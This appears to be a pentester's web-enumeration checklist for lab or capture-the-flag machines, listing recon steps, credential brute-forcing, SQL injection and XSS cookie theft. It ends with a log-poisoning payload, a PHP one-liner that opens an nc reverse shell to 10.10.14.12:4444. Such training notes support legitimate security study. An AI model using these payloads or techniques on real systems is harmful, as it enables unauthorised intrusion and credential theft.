Enumeration checklist
- Checkout what the web display
- Read entire pages. Enumerate for emails, names, user info etc.
- Directory discovery
- Enum the interface, version of CMS? Server installation page?
- Potential vulnerability? LFI, RFI, XEE, Upload?
- Default web server page, version information
- View source code
- Hidden Values
- Developer Remarks
- Extraneous Code
- Passwords
- Robots.txt
- Web scanning
Might have username
Create a list of the IP and Extract PNG
for ip in $(cat web-ip.txt | grep 80 | grep -v "Nmap" |
awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;done
Make it HTML pngtohtml.sh
#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> w
eb.html
echo "</BODY></HTML>" >> web.html
- cewl
- noredirect plugin
- View source code
- Use default password
- Brute force directory first (sometime you don't need to login to pwn the machine)
- Search credential by bruteforce directory
- bruteforce credential
- Search credential in other service port
- Enumeration for the credential
- Register first
- SQL injection
- XSS can be used to get the admin cookie
- Bruteforce session cookie
wafw00f
- Google
- Scan for heartbleedsslscan $ip:443nmap -sV --script=ssl-heartbleed $ip
When presented with an enter credentials page, the first thing I try is common credentials (admin/admin, admin/password).
If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails.
From LFI to RCE
If you get local file inclusion for log, you maybe can log poisoning the log
Change user agent by intercept in burp to this to get reverse shell
nc -lnvp 4444
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4444 >/tmp/f') ?>
Last modified 1yr ago